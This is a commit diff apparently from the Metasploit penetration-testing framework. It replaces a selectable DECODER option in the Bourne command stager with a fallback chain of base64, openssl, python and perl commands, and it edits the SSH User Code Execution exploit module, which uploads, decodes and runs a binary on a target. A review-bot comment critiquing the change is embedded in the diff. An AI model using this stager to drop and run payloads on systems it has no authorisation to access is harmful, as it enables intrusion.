Remove the DECODER option
parent
aceba9fc8a
commit
8b5a83c7f5
|
@ -1,7 +1,4 @@
|
|||
# -*- coding: binary -*-
|
||||
##
|
||||
# $Id: cmdstager_bourne.rb
|
||||
##
|
||||
|
||||
require 'msf/core/exploit/cmdstager'
|
||||
|
||||
|
@ -16,49 +13,9 @@ module Exploit::CmdStagerBourne
|
|||
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptEnum.new( 'DECODER', [ false, 'The decoding binary to use', 'auto', ['auto', 'base64', 'openssl', 'python', 'perl']]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def create_stager(exe)
|
||||
Rex::Exploitation::CmdStagerBourne.new(exe)
|
||||
end
|
||||
|
||||
def generate_cmdstager(opts = {}, pl = nil)
|
||||
available_decoders = ['base64', 'openssl', 'python', 'perl']
|
||||
opts.merge!({ :decoder => datastore['DECODER'] })
|
||||
|
||||
if opts[:decoder] == 'auto'
|
||||
if self.respond_to? :execute_command_with_feedback
|
||||
available_decoders.each do |bin|
|
||||
which_result = execute_command_with_feedback("which #{bin}", opts).to_s
|
||||
which_result = which_result.strip
|
||||
if which_result.split.length == 1 and which_result.end_with?(bin)
|
||||
opts[:decoder] = bin
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
if opts[:decoder] == 'auto'
|
||||
print_error("Could not detect an appropriate decoder, try setting the DECODER option")
|
||||
raise ArgumentError
|
||||
else
|
||||
print_status("Command Stager using auto-detected decoder: #{opts[:decoder]}")
|
||||
end
|
||||
end
|
||||
|
||||
if not available_decoders.include?(opts[:decoder])
|
||||
print_error("Decoder must be one of #{available_decoders.join(', ')}")
|
||||
raise ArgumentError
|
||||
end
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
# -*- coding: binary -*-
|
||||
# $Id: mixins.rb 16142 2012-11-30 19:45:04Z rapid7 $
|
||||
# $Id$
|
||||
#
|
||||
# All exploit mixins should be added to the list below
|
||||
#
|
||||
|
|
|
@ -1,7 +1,4 @@
|
|||
# -*- coding: binary -*-
|
||||
##
|
||||
# $Id: bourne.rb
|
||||
##
|
||||
|
||||
require 'rex/text'
|
||||
require 'rex/arch'
|
||||
|
@ -21,6 +18,8 @@ class CmdStagerBourne < CmdStagerBase
|
|||
|
||||
def generate(opts = {})
|
||||
opts[:temp] = opts[:temp] || '/tmp/'
|
||||
opts[:temp] = opts[:temp].gsub(/'/, "\\\\'")
|
||||
opts[:temp] = opts[:temp].gsub(/ /, "\\ ")
|
||||
super
|
||||
end
|
||||
|
||||
|
@ -67,18 +66,20 @@ class CmdStagerBourne < CmdStagerBase
|
|||
# Generate the commands that will decode the file we just created
|
||||
#
|
||||
def generate_cmds_decoder(opts)
|
||||
case opts[:decoder]
|
||||
when 'base64'
|
||||
decoder = "base64 --decode #{@tempdir}#{@var_encoded}.b64"
|
||||
when 'openssl'
|
||||
decoder = "openssl enc -d -A -base64 -in #{@tempdir}#{@var_encoded}.b64"
|
||||
when 'python'
|
||||
decoder = "python -c 'import sys; import base64; print base64.standard_b64decode(sys.stdin.read());' < #{@tempdir}#{@var_encoded}.b64"
|
||||
when 'perl'
|
||||
decoder = "perl -MIO -e 'use MIME::Base64; while (<>) { print decode_base64($_); }' < #{@tempdir}#{@var_encoded}.b64"
|
||||
decoders = [
|
||||
"base64 --decode #{@tempdir}#{@var_encoded}.b64",
|
||||
"openssl enc -d -A -base64 -in #{@tempdir}#{@var_encoded}.b64",
|
||||
"python -c 'import sys; import base64; print base64.standard_b64decode(sys.stdin.read());' < #{@tempdir}#{@var_encoded}.b64",
|
||||
"perl -MIO -e 'use MIME::Base64; while (<>) { print decode_base64($_); }' < #{@tempdir}#{@var_encoded}.b64"
|
||||
]
|
||||
decoder_cmd = []
|
||||
decoders.each do |cmd|
|
||||
binary = cmd.split(' ')[0]
|
||||
decoder_cmd << "(which #{binary} >&2 && #{cmd})"
|
||||
end
|
||||
decoder << " > #{@tempdir}#{@var_decoded}.bin"
|
||||
[ decoder ]
|
||||
decoder_cmd = decoder_cmd.join(" || ")
|
||||
decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > #{@tempdir}#{@var_decoded}.bin"
|
||||
[ decoder_cmd ]
|
||||
end
|
||||
|
||||
def compress_commands(cmds, opts)
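Review bot: The comment above `generate_cmds_decoder` no longer describes the method, because the new body never reads `opts[:decoder]` and returns a single shell line that tries base64, openssl, python and perl in that fixed order with stderr sent to `/dev/null`. I would replace it with `# Returns one command that tries each base64 decoder in turn (base64, openssl, python, perl); opts[:decoder] is ignored`, and state in the commit description that a caller still passing `:decoder` is now silently ignored. The failure behaviour also changes: when no decoder is found the outer redirect still creates an empty `.bin` and nothing is reported, whereas the removed mixin code printed an error and raised `ArgumentError`, so that deserves a line in the comment as well. As a style point, `decoder_cmd` is bound first to an array and then to a string; `decoders.map { |cmd| "(which #{cmd.split.first} >&2 && #{cmd})" }.join(" || ")` builds the chain without the rebinding.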
|
||||
|
|
|
@ -1,3 +1,9 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'net/ssh'
|
||||
|
@ -12,7 +18,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'SSH User Code Execution',
|
||||
'Version' => '',
|
||||
'Description' => %q{
|
||||
This module utilizes a stager to upload a base64 encoded
|
||||
binary which is then decoded, chmod'ed and executed from
|
||||
|
@ -88,16 +93,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
def execute_command_with_feedback(cmd, opts = {})
|
||||
begin
|
||||
Timeout.timeout(3) do
|
||||
feedback = self.ssh_socket.exec!("#{cmd}\n")
|
||||
return feedback
|
||||
end
|
||||
rescue ::Exception
|
||||
end
|
||||
end
|
||||
|
||||
def do_login(ip, user, pass, port)
|
||||
opt_hash = {
|
||||
:auth_methods => ['password', 'keyboard-interactive'],
|
||||
|
|